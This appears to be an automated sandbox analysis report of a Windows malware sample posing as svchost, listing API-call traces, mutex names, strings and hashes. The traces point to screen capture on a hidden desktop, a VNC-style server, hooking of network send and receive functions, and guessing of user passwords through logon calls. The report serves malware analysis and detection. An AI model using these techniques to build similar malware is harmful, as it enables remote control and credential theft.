                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD321F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD326C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3277
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3291
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 505831200-465362393
                                                                                                                                                                                                                • Opcode ID: b332bc7398d7e59a256677b9d9e81de3c775f3492c352e7e465d2a936134b652
                                                                                                                                                                                                                • Instruction ID: 7b7cde57d9647831640f838d481e6a93ababbdf98e7367950562e66d2c83ad52
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b332bc7398d7e59a256677b9d9e81de3c775f3492c352e7e465d2a936134b652
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6110430AC67527BF2705B648C0AF8E77D4AF04B55F508688FB95A21C1EBF094058FA7
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02BBA25E
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBA29F
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002,00000000), ref: 02BBA325
                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02BBA34C
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02BBA391
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02BBA3E5
                                                                                                                                                                                                                  • Part of subcall function 02BBA100: GetTickCount.KERNEL32 ref: 02BBA18A
                                                                                                                                                                                                                  • Part of subcall function 02BBA100: GetClassLongA.USER32(00000000,000000E6), ref: 02BBA1DD
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000112,?,?), ref: 02BBA44E
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02BBA479
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02BBA4F5
                                                                                                                                                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 02BBA514
                                                                                                                                                                                                                • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02BBA538
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA5A3
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02BBA5B6
                                                                                                                                                                                                                • PostMessageA.USER32(?,?,00000001,00000000), ref: 02BBA5D9
                                                                                                                                                                                                                • PostMessageA.USER32(?,?,00000002,00000000), ref: 02BBA5FB
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA633
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA65D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 590198697-0
                                                                                                                                                                                                                • Opcode ID: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                                • Instruction ID: 6356255b7b55eacdcf68ebfb71cbb12f324b9cd700084acb856463e00a31301a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2B17932F4021426EB329A18D889FFE7758DF81755F0840AAFE48E7182C7E9C861C7A1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7702DB30), ref: 00401EC6
                                                                                                                                                                                                                • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7702DB30), ref: 00401EE2
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                                • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                  • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                                • String ID: %s1$%s12$%s123
                                                                                                                                                                                                                • API String ID: 1588441251-2882894844
                                                                                                                                                                                                                • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                                • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,7556F590,755616B0,?), ref: 02BB902F
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB9142
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB915F
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?), ref: 02BB9194
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                • API String ID: 188880187-3887548279
                                                                                                                                                                                                                • Opcode ID: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                                • Instruction ID: 354fc3fd9d13f3d189becb481a452ea0169f03e41d30372ffc7b453bb87baad3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D414F71E41314AFDB60CFA8D889FEA7BB8EB49750F544569E608EB381D7705810CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7556F550,7556DF10,02BC598B), ref: 02BC9831
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02BC9843
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: memcpy.MSVCRT(?,?,00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA5A0
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC9862
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,send), ref: 02BC9870
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02BC988C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02BC98A8
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,recv), ref: 02BC98C4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                                • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                                • API String ID: 1216545827-2206184491
                                                                                                                                                                                                                • Opcode ID: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                                • Instruction ID: 706086d7263a89eedce37d64d4fa08687f9015a9991ce9633dbe8181c86b88b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1012972BC5F1A71FA6036760D02F2B134C5B84F88F3505E87603B6095EA98E50945B8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7077), ref: 02BD1A2D
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617d7077,KBP), ref: 02BD1A47
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617d7077$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 4173420962-1284881761
                                                                                                                                                                                                                • Opcode ID: ac9b7bb9d85963349967b14a2cea727ab9f38ee3809c726c80f3b850fff72a6d
                                                                                                                                                                                                                • Instruction ID: 940a88cebf5f0d4d1007363fcfa309b82fa228f4fb357b7dc6c7f65ff04a96ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac9b7bb9d85963349967b14a2cea727ab9f38ee3809c726c80f3b850fff72a6d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE014934AD57127BF37067A84C4AF8E369C9F04B91F500250FB69771C0ABE0A90087BA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                                • String ID: RFB 003.006
                                                                                                                                                                                                                • API String ID: 725816019-3790533501
                                                                                                                                                                                                                • Opcode ID: 12d1a168e113521dcfef7c61ccb10b8e5ea1fc18e3d77025a5d5d75808129f78
                                                                                                                                                                                                                • Instruction ID: 33c5ccd3f80c4411ab2af1f22f274613ebb151a6400bccb3516cbeb060aa573d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12d1a168e113521dcfef7c61ccb10b8e5ea1fc18e3d77025a5d5d75808129f78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06C149B0A046448FDB14CF29D484B96BBE5FF88310F1985BADD5A8F356E775A800CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                                • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7077), ref: 02BD1A2D
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617d7077,KBP), ref: 02BD1A47
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617d7077$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 4173420962-1284881761
                                                                                                                                                                                                                • Opcode ID: 7c1532f9457d04f957666a4081261d1cacc261c0dd115bfecdc087baa5c066f4
                                                                                                                                                                                                                • Instruction ID: 17d90afdf5bf5e5a5ff614d7e8a6d35884979228bb7e529a97e0fd2ac6cf6099
